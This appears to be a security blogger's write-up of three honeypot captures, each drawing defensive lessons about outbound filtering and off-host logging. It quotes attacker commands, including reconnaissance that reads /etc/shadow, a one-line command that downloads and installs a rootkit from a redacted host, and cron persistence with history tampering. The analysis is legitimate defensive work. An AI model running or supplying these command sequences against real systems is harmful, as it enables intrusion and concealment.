The honeypot v2 — first interesting captures

I have been running the high-interaction honeypot I designed in October for six weeks. The setup is essentially as planned: a real Linux box, deliberately compromised on a regular schedule, behind a firewall that lets the attacker in but stops them from launching attacks against anyone else. Every byte of every interaction is captured.

In six weeks I have logged about thirty discrete compromise events, of which maybe ten produced data interesting enough to be worth writing about. Three are worth describing in detail because each teaches a different lesson.

Capture one: the patient enumerator

Date, sanitised: a weekend evening, late.

The attacker had compromised the honeypot via a known vulnerability in a service I had deliberately left unpatched. The exploit succeeded; they had a root shell. What happened next was instructive.

For the first ninety seconds, no commands. They were watching. Probably waiting to see whether the shell was monitored, whether the connection got kicked, whether anything happened at all.

Then, in this exact order: w, last, ps -ef, netstat -an, cat /etc/passwd, cat /etc/shadow, ls /root, ls /home, cat ~/.bash_history (mine), cat /root/.bash_history, find / -perm -4000 -type f 2>/dev/null (looking for SUID binaries), crontab -l, cat /etc/cron.d/*, find /var/log -type f -mtime -7 (recent log activity), uname -a, cat /proc/version, cat /proc/cpuinfo, df -h, mount.

Twenty separate commands in about two minutes, all read-only, none doing any harm to the system. They were enumerating. Nothing else.

At the end, they typed id, saw they were root, and then issued a single command: wget http://[a server I do not name]/x.tgz. The wget was, as designed, blocked at the firewall. They tried curl. Same result. They tried opening a TCP connection to port 80 outbound directly with bash's /dev/tcp/. Same result. After about thirty seconds of trying to fetch their toolkit, they gave up. Closed the shell. Did not return.

The lesson: a competent attacker's first action is reconnaissance, not exploitation. The full attack sequence is enumerate, fetch tools, deploy, persist, pivot, exfiltrate. My honeypot caught them at the boundary between enumerate and fetch. The block at fetch-tools is decisive — without their tools, they have nothing useful to do.

For a real defender: outbound HTTP from a compromised internal host is the indicator I would now most watch for. The attacker's tools live elsewhere; the moment of fetching them is the moment they expose themselves.

Capture two: the script kiddie

Different night, different attacker, different shape.

This one ran a single command sequence within seconds of getting shell:

wget http://[host]/rk.tgz; tar xzf rk.tgz; cd rk; ./install

A pre-packaged rootkit, attempted to deploy in one motion. The wget was blocked. The shell exited. They did not investigate further.

The rootkit's URL was, on later analysis, an underground board's standard package. Their script was clearly something they had got from a tutorial or a friend; their understanding of what to do when the wget failed was zero. They had a recipe, the recipe required a successful download, the download did not work, end of attack.

The lesson: a substantial fraction of attackers are running scripts. The scripts have rigid sequences. Anything that breaks the sequence stops the attacker dead. This is not the population of skilled attackers — they are the long tail of less-skilled but volume actors.

For a real defender: many attacks fail because of the simplest possible defensive measure. Outbound network filtering on a compromised host stops the script kiddie pattern at the first step. The defence does not need to anticipate the attack; it needs to block whatever the attack assumes.

Capture three: the patient operator

The most interesting capture. A sanitised summary, because details would identify the attacker more than I want.

Attacker compromised the honeypot via the same vulnerability as the first capture. Did the same enumeration sequence, more thoroughly. After enumerating, instead of trying to fetch tools, they did something I had not anticipated: they studied the system.

For about forty minutes they read configuration files. The Apache config, line by line. The mail config. The cron entries. The log files for the past week. The contents of /etc/init.d/. They were building a mental model of this specific machine.

Then they did three things in sequence:

Modified one cron job to add a single line, executing a small script that they wrote into /tmp/.x.sh. The cron change was tiny — they appended one entry to a file with many entries, and the appended entry was visually consistent with the others.
Created a hidden file in /tmp/ containing a few configuration values for what was clearly a custom backdoor.
Modified ~root/.bash_history to remove evidence of their own commands. Specifically, they edited it with sed to remove only the lines that referenced their own activity, leaving the rest of the history intact.

Then they exited cleanly.

The new cron job's script was designed to phone home — but the phone-home was blocked at the firewall. The custom backdoor was designed to work on this exact machine. The history-manipulation was designed to leave no trace of the visit.

If I had not been watching the firewall, the OS-level audit log, and the serial console, I would not have caught any of this. The bash history showed nothing. The system files were untouched. The only evidence was in places the attacker could not reach.

The lesson: skilled attackers are quiet. They study the system. They make minimal changes. They cover their traces locally. The only way to detect this kind of attacker is from outside the compromised system. Logs that live on the compromised host are inadequate evidence; the attacker can rewrite them.

This is why the structured-logging discipline matters so much when the logs are forwarded off-host. It is also why every serious incident-response procedure has to start with the assumption that on-host artefacts may have been tampered with.

What I am taking from six weeks

A few generalisations that I am holding tentatively, given my calibrated uncertainty discipline:

The threat population has wide variance. The first capture was a moderately skilled enumerator. The second was a script-following novice. The third was someone genuinely capable. The defensive measures that work against each are different.

Outbound network filtering is the highest-leverage single defence. Every successful attack I have seen would have been disrupted, in one way or another, by tighter outbound filtering on compromised hosts.

Off-host logging is the second-highest-leverage defence. The skilled attacker covers traces locally. Anything that does not live on the compromised host is what tells you what happened.

The honeypot itself is generating useful intelligence. This was the hypothesis. Six weeks of data is too short to be definitive but is encouraging. I will keep it running and write further captures as they appear.

More as the year develops. The next planned post is on the Phrack 56 reading I have been doing.